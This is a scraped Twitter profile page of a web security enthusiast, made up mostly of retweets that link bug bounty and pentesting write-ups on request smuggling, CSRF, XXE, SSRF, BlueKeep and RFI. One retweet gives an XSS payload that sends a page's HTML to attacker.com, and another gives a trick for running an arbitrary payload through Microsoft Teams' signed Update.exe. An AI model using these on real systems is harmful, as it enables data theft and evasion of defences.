zerodayguys

@zerodayguys

A web security Enthusiast with a zest to explore.... Rakesh singh

Vrijeme pridruživanja: studeni 2013.

Tweetovi

Blokirali ste korisnika/cu @zerodayguys

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @zerodayguys

  1. proslijedio/la je Tweet
    7. sij

    How to takeover an account via HTTP Request Smuggling? What are lesser-known tools for Android Application PenTesting? How to hunt for credentials and secrets in IOS Apps? All those answers are available in the latest edition of our ! 👇👇👇

    Poništi
  2. proslijedio/la je Tweet
    8. sij

    New Writing Bypass SameSite Cookies Default to Lax and get CSRF Looking at a new Chrome feature and the 2 minute quirk which make it possible to bypass it, also solution to my CSRF challenge.

    Poništi
  3. proslijedio/la je Tweet
    2. sij

    Are you looking for a remote job in 2020? 👩‍💻 Reply to this thread with your preferred job position, your skills and a link to your work 👷‍♂️If you're hiring remotely, browse this thread to find talent RT for visibility👇

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    7. pro 2019.

    I recently exploited an XXE with a very cool trick and wrote a blog post tl;dr; Exploiting XXE to read files when HTTP OOB is not allowed but errors are enabled :D

    Poništi
  5. proslijedio/la je Tweet
    13. pro 2019.

    I was excited about this write-up. A must-read! Awesome . Want to see more amazing stuff from you on our program(s).

    Poništi
  6. proslijedio/la je Tweet
    13. pro 2019.

    Hi, If you want to know how SSRF Vulnerability was exist in Vimeo, you should read: Reported through ;)

    Poništi
  7. Poništi
  8. proslijedio/la je Tweet
    5. pro 2019.

    Using SerializationDumper for Java Deserialization and CTFs

    Poništi
  9. proslijedio/la je Tweet
    18. stu 2019.
    Poništi
  10. proslijedio/la je Tweet
    16. stu 2019.

    How to Exploit BlueKeep Vulnerability with Metasploit ( This can help to add more targets )

    Poništi
  11. proslijedio/la je Tweet
    19. stu 2019.
    Poništi
  12. proslijedio/la je Tweet
    19. stu 2019.
    Poništi
  13. proslijedio/la je Tweet
    10. lis 2019.

    A payload that steals source code of the current webpage without triggering browser restrictions, by <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

    Poništi
  14. proslijedio/la je Tweet
    4. ruj 2019.

    I'm happy to introduce "gitGraber". A python tool developed with the help of to monitor GitHub to find sensitive data. Keep in mind: the goal is for live monitoring and it's a PoC. We will try to improve this tool in the future.

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    27. kol 2019.

    Revealing AWS S3 bucket name: step 1: Find any CDN object URL step 2: append following string to after URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc ` and boom it will reveal the bucket name.

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    24. kol 2019.

    Look who is back!

    Poništi
  17. proslijedio/la je Tweet
    26. lip 2019.

    Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\ Then %userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args" Trusted signed binary will run the payload for you 😊

    Poništi
  18. proslijedio/la je Tweet
    21. svi 2019.

    The Real Impact of Open Redirect, Advanced CORS Exploitation Techniques, Common API Pitfalls and more in the latest edition of ! 👉 👈

    Poništi
  19. proslijedio/la je Tweet
    20. svi 2019.

    Dork to find Acquisitions of a Company site: intitle:CompanyName acquires eg: site: intitle:Facebook acquires Results:Check the image

    Poništi
  20. proslijedio/la je Tweet
    11. svi 2019.

    Everyone was saying RFI is dead in PHP applications (including me). Today, I got a way to perform RFI even if remote URL inclusion is disabled. I blogged about it 😄 SMB is loaded with awesomeness \m/

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·